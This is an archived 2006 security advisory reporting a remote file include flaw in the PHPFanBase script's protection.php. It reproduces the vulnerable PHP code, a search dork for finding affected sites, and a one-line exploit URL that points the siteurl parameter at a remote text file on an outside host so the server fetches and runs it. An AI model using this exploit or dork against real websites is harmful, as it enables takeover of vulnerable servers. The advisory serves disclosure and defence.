PHPFanBase (protection.php) Remote File Include Vulnerability

2006-12-20T00:00:00
ID SECURITYVULNS:DOC:15453
Type securityvulns
Reporter Securityvulns
Modified 2006-12-20T00:00:00

Description

--------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||-----------------------------------------

PHPFanBase (protection.php) Remote File Include Vulnerability

Found By : CoLd Zero [ Wasem898 ] Source : www.4azhar.com SpECiALPowEr.oRg A_mal Team

PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

PHPFanBase ]All[

Class: Remote File Include Vulnerability

Published 2006-12-19

Remote: Yes

Type: Dangerous

Site: http://codegrrl.com/!/scripts/

Author: Cold Zero

Contact: c.o.1.d.0@hotmail.com

Dork: Powered By PHPFanBase

File :

/protection.php

===========================

<?

$user_passwords = array (

   &quot;$admin_username&quot; =&gt; &quot;$admin_password&quot;  &#41;;

// This is the page to show when the user has been logged out $logout_page = "$siteurl";

// Page with login form $login_page = "login.php";

// Page to show if the user enters an invalid login name or password $invalidlogin_page = "invalidlogin.php";

//DON'T EDIT ANYTHING BELOW THIS!!!

if ($action == "logout") { Setcookie("logincookie[pwd]","",time() -86400); Setcookie("logincookie[user]","",time() - 86400); include($logout_page); exit; } else if ($action == "login") { if (($loginname == "") || ($password == "")) { include($invalidlogin_page); exit; } else if (strcmp($user_passwords[$loginname],$password) == 0) { Setcookie("logincookie[pwd]",$password,time() + 86400); Setcookie("logincookie[user]",$loginname,time() + 86400); } else { include($invalidlogin_page); exit; } } else { if (($logincookie[pwd] == "") || ($logincookie[user] == "")) { include($login_page); exit; } else if (strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) = = 0) { Setcookie("logincookie[pwd]",$logincookie[pwd],time() + 86400); Setcookie("logincookie[user]",$logincookie[user],time() + 86400) ; } else { include($invalidlogin_page); exit; } }

===========================

Exploit :

Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt?

======================================================

---- GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[ Everyone I know


*www.4azhar.com Securty Team >> www.4azhar.com *

*SpeciaL PoweR SecuritY Team >> www.specialpower.org *

*A_mal Hacking Team >> -vv -l -p The-Pradise *


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

--------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||-----------------------------------------